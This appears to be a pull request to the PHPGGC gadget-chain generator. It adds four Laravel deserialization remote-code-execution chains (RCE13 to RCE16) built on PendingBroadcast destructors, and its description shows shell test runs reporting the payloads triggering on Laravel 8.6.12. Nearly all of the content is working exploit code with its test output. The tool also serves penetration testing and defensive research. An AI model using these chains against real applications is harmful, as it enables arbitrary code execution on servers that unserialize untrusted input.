### PR TITLE
the rest of chains for Laravel

### DIFF
--- a/gadgetchains/Laravel/RCE/13/chain.php
+++ b/gadgetchains/Laravel/RCE/13/chain.php
@@ -1,0 +1,22 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+    public static $information = 'use array_filter (can also use array_walk';
+
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $param = $parameters['parameter'];
+
+        $a = new \Illuminate\Broadcasting\PendingBroadcast($function, $param);
+
+        return $a;
+    }
+}

--- a/gadgetchains/Laravel/RCE/13/chain.php
+++ b/gadgetchains/Laravel/RCE/13/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Laravel;
 
 class RCE13 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $version = '5.8.3 <= 8.x-dev';
     public static $vector = '__destruct';
     public static $author = 'CyanM0un';
     public static $information = 'use array_filter (can also use array_walk';

--- a/gadgetchains/Laravel/RCE/13/gadgets.php
+++ b/gadgetchains/Laravel/RCE/13/gadgets.php
@@ -1,0 +1,27 @@
+<?php
+
+namespace Illuminate\Broadcasting
+{
+    class PendingBroadcast
+    {
+        protected $events;
+
+        function __construct($function,$paramter)
+        {
+            $this->events = new \Illuminate\Database\DatabaseManager($function,$paramter);
+        }
+    }
+}
+
+namespace Illuminate\Database{
+    class DatabaseManager{
+        protected $app;
+        protected $extensions;
+        
+        function __construct($function,$paramter)
+        {
+            $this->app = array("config"=>array("database.default"=>$function,"database.connections"=>array($function=>array($paramter))));
+            $this->extensions[$function] = "array_filter";//or array_walk
+        }
+    }
+}

--- a/gadgetchains/Laravel/RCE/14/chain.php
+++ b/gadgetchains/Laravel/RCE/14/chain.php
@@ -1,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE14 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $param = $parameters['parameter'];
+
+        return new \Illuminate\Broadcasting\PendingBroadcast($function,$param);
+    }
+}

--- a/gadgetchains/Laravel/RCE/14/gadgets.php
+++ b/gadgetchains/Laravel/RCE/14/gadgets.php
@@ -1,0 +1,38 @@
+<?php
+
+namespace Illuminate\Broadcasting
+{
+    class PendingBroadcast
+    {
+        protected $events;
+
+        function __construct($function,$param)
+        {
+            $this->events = new \Faker\ValidGenerator($function,$param);
+        }
+    }
+}
+
+namespace Faker{
+    class ValidGenerator{
+        protected $generator;
+        protected $maxRetries;
+        protected $validator;
+
+        function __construct($function,$param)
+        {
+            $this->maxRetries = 1;
+            $this->validator = $function;
+            $this->generator = new \Faker\DefaultGenerator($param);
+        }
+    }
+
+    class DefaultGenerator{
+        protected $default;
+
+        function __construct($param)
+        {
+            $this->default = $param;
+        }
+    }
+}

--- a/gadgetchains/Laravel/RCE/15/chain.php
+++ b/gadgetchains/Laravel/RCE/15/chain.php
@@ -1,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $param = $parameters['parameter'];
+        
+        return new \Illuminate\Broadcasting\PendingBroadcast($function,$param);
+    }
+}

--- a/gadgetchains/Laravel/RCE/15/chain.php
+++ b/gadgetchains/Laravel/RCE/15/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Laravel;
 
 class RCE15 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $version = '5.8.0 <= 8.x-dev';
     public static $vector = '__destruct';
     public static $author = 'CyanM0un';
 

--- a/gadgetchains/Laravel/RCE/15/gadgets.php
+++ b/gadgetchains/Laravel/RCE/15/gadgets.php
@@ -1,0 +1,43 @@
+<?php
+namespace Illuminate\Broadcasting
+{
+    class PendingBroadcast
+    {
+        protected $events;
+
+        function __construct($function,$param)
+        {
+            $this->events = new \Illuminate\Queue\QueueManager($function,$param);
+        }
+    }
+}
+
+namespace Illuminate\Queue{
+
+    class QueueManager{
+        protected $app;
+        protected $connectors;
+
+        function __construct($function,$param)
+        {
+            $this->app = array("config"=>array("queue.default"=>"key","queue.connections.key"=>array("driver"=>"func")));
+            $this->connectors = array("func"=>[new \Illuminate\Auth\RequestGuard($function,$param),"user"]);   
+        }
+    }
+}
+
+namespace Illuminate\Auth
+{
+    class RequestGuard{
+        protected $callback;
+        protected $request;
+        protected $provider;
+
+        public function __construct($function,$param)
+        {
+            $this->callback = "call_user_func";
+            $this->request = $function;
+            $this->provider = $param;
+        }
+    }
+}

--- a/gadgetchains/Laravel/RCE/16/chain.php
+++ b/gadgetchains/Laravel/RCE/16/chain.php
@@ -1,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE16 extends \PHPGGC\GadgetChain\RCE\FunctionCall
+{
+    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+    public static $information = 'add a entry for rce10';
+
+    public function generate(array $parameters)
+    {
+        $function = $parameters['function'];
+        $param = $parameters['parameter'];
+        
+        return new \Monolog\Handler\RotatingFileHandler($function,$param);
+    }
+}

--- a/gadgetchains/Laravel/RCE/16/chain.php
+++ b/gadgetchains/Laravel/RCE/16/chain.php
@@ -4,7 +4,7 @@ namespace GadgetChain\Laravel;
 
 class RCE16 extends \PHPGGC\GadgetChain\RCE\FunctionCall
 {
-    public static $version = 'test on 5.8.35, 7.0.0, 9.3.10';
+    public static $version = '5.8.0 <= 6.0.0';
     public static $vector = '__destruct';
     public static $author = 'CyanM0un';
     public static $information = 'add a entry for rce10';

--- a/gadgetchains/Laravel/RCE/16/gadgets.php
+++ b/gadgetchains/Laravel/RCE/16/gadgets.php
@@ -1,0 +1,48 @@
+<?php
+namespace Monolog\Handler
+{
+    class RotatingFileHandler
+    {
+        protected $mustRotate;
+        protected $filename;
+        protected $filenameFormat;
+        protected $dateFormat;
+
+        function __construct($function,$param)
+        {
+            $this->dateFormat = "l";
+            $this->mustRotate = true;
+            $this->filename = "anything";
+            $this->filenameFormat = new \Illuminate\Validation\Rules\RequiredIf($function,$param);
+        }
+    }
+}
+
+namespace Illuminate\Validation\Rules
+{
+    class RequiredIf
+    {
+        public $condition;
+
+        public function __construct($function,$param)
+        {
+            $this->condition = [new \Illuminate\Auth\RequestGuard($function,$param),"user"];
+        }
+    }
+}
+
+namespace Illuminate\Auth
+{
+    class RequestGuard{
+        protected $callback;
+        protected $request;
+        protected $provider;
+
+        public function __construct($function,$param)
+        {
+            $this->callback = "call_user_func";
+            $this->request = $function;
+            $this->provider = $param;
+        }
+    }
+}


### PR DESCRIPTION
Hi, for your convenience this time, I test the compatibility and have some questions.
The result of test-gc-compatibility.py shows that RCE13, RCE15 and RCE16 maps these versions:
![image](https://user-images.githubusercontent.com/75713958/201839097-d8fd060f-6638-47c0-93cb-932c3ee2527f.png)
......
![image](https://user-images.githubusercontent.com/75713958/201839201-b5a01515-13d9-4a2c-99d0-ada483b89485.png)
......
![image](https://user-images.githubusercontent.com/75713958/201839235-2e634ff4-2c44-4182-9cf4-b94f07919d9d.png)
which I have written in the chain.php.

But when I use composer to build and test the project manually, the results show that it all worked. And I am confused about this.
for example the 8.6.12:
```bash
root@26ff7789df03:/phpggc# composer create-project laravel/laravel=8.6.12 laravel_8.6.12
root@26ff7789df03:/phpggc# cd laravel_8.6.12/
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce12 --test-payload
Trying to deserialize payload...
SUCCESS: Payload triggered !
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce14 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught OverflowException: Maximum retries of 1 reached without finding a valid value in /phpggc/laravel_8.6.12/vendor/fakerphp/faker/src/Faker/ValidGenerator.php:72
Stack trace:
#0 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Broadcasting/PendingBroadcast.php(72): Faker\ValidGenerator->__call()
#1 [internal function]: Illuminate\Broadcasting\PendingBroadcast->__destruct()
#2 {main}
  thrown in /phpggc/laravel_8.6.12/vendor/fakerphp/faker/src/Faker/ValidGenerator.php on line 72
SUCCESS: Payload triggered !
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce16 --test-payload
Trying to deserialize payload...
SUCCESS: Payload triggered !
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce15 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught Error: Call to a member function connect() on string in /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Queue/QueueManager.php:163
Stack trace:
#0 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Queue/QueueManager.php(138): Illuminate\Queue\QueueManager->resolve()
#1 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Queue/QueueManager.php(291): Illuminate\Queue\QueueManager->connection()
#2 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Broadcasting/PendingBroadcast.php(72): Illuminate\Queue\QueueManager->__call()
#3 [internal function]: Illuminate\Broadcasting\PendingBroadcast->__destruct()
#4 {main}
  thrown in /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Queue/QueueManager.php on line 163
SUCCESS: Payload triggered !
root@26ff7789df03:/phpggc/laravel_8.6.12# php ../phpggc laravel/rce13 --test-payload
Trying to deserialize payload...
PHP Fatal error:  Uncaught TypeError: Argument 1 passed to Illuminate\Database\DatabaseManager::configure() must be an instance of Illuminate\Database\Connection, array given, called in /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Database/DatabaseManager.php on line 95 and defined in /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Database/DatabaseManager.php:175
Stack trace:
#0 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Database/DatabaseManager.php(95): Illuminate\Database\DatabaseManager->configure()
#1 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Database/DatabaseManager.php(442): Illuminate\Database\DatabaseManager->connection()
#2 /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Broadcasting/PendingBroadcast.php(72): Illuminate\Database\DatabaseManager->__call()
#3 [internal function]: Illuminate\Broadcasting\PendingBroadcast->__destruct()
#4 {main}
  thrown in /phpggc/laravel_8.6.12/vendor/laravel/framework/src/Illuminate/Database/DatabaseManager.php on line 175
SUCCESS: Payload triggered !
```
And for the versions >= 9.0.0, it requires PHP > 8, the PHP 7.4 can't composer install (I am not sure if this has anything to do with the result), I changed the PHP environment and the results show the same:
```bash
composer create-project laravel/laravel=9.3.10
```
![13_7M2C %%MR0NYF)FOY3S2](https://user-images.githubusercontent.com/75713958/201841408-1a619a89-fcca-4e89-821b-f38d9fdeda0b.png)
Emmmm ... really confused.